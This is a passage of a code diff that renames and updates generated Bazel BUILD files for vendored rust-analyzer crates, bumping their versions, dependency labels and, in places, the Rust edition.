a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer": "rustc_lexer", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer": "rustc_lexer", }, compile_data = glob( include = ["**"], @@ -33,7 +33,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -83,9 +83,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel index 5d27526cf686..cdef8ca0b9a3 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel @@ -17,7 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", }, compile_data = glob( include = ["**"], @@ -32,7 +32,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -82,12 +82,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel similarity index 76% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel index 592b32e7a456..70595c88a116 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_base_db-0.0.266.bazel @@ -17,12 +17,12 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], @@ -87,20 +87,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__lz4_flex-0.11.3//:lz4_flex", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_salsa-0.0.258//:ra_salsa", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__semver-1.0.24//:semver", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__lz4_flex-0.11.3//:lz4_flex", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_salsa-0.0.266//:ra_salsa", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel similarity index 90% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel index 779a777c067a..e58f52a7129d 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_cfg-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -86,11 +86,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel index eed58b91a1f2..2c7410fd47f7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_edition-0.0.266.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel similarity index 68% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel index 54a350d42d68..5a688858e7fb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir-0.0.266.bazel @@ -17,16 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def": "hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_hir_ty-0.0.258//:ra_ap_hir_ty": "hir_ty", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def": "hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_hir_ty-0.0.266//:ra_ap_hir_ty": "hir_ty", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -91,24 +91,25 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__either-1.13.0//:either", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_hir_ty-0.0.258//:ra_ap_hir_ty", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_hir_ty-0.0.266//:ra_ap_hir_ty", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel similarity index 61% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel index 1018a98e564d..a8280467c4d9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel @@ -17,16 +17,15 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe": "mbe", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe": "mbe", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -91,36 +90,36 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__dashmap-5.5.3//:dashmap", - "@vendor__drop_bomb-0.1.5//:drop_bomb", - "@vendor__either-1.13.0//:either", - "@vendor__fst-0.4.7//:fst", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra-ap-rustc_abi-0.87.0//:ra_ap_rustc_abi", - "@vendor__ra-ap-rustc_parse_format-0.87.0//:ra_ap_rustc_parse_format", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__text-size-1.1.1//:text_size", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__dashmap-5.5.3//:dashmap", + "@vendor_ts__drop_bomb-0.1.5//:drop_bomb", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra-ap-rustc_abi-0.97.0//:ra_ap_rustc_abi", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_parse_format-0.97.0//:ra_ap_rustc_parse_format", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__text-size-1.1.1//:text_size", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel similarity index 67% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel index 6baf3717b846..8c89fecda8d8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel @@ -17,17 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe": "mbe", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge": "syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe": "mbe", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge": "syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -92,27 +91,26 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel similarity index 60% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel index ea0475075893..9770a5812cf5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel @@ -17,14 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def": "hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def": "hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", }, compile_data = glob( include = ["**"], @@ -41,7 +40,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -92,38 +91,38 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__chalk-recursive-0.98.0//:chalk_recursive", - "@vendor__chalk-solve-0.98.0//:chalk_solve", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__ena-0.14.3//:ena", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__oorandom-11.1.4//:oorandom", - "@vendor__ra-ap-rustc_abi-0.87.0//:ra_ap_rustc_abi", - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__ra-ap-rustc_pattern_analysis-0.87.0//:ra_ap_rustc_pattern_analysis", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - 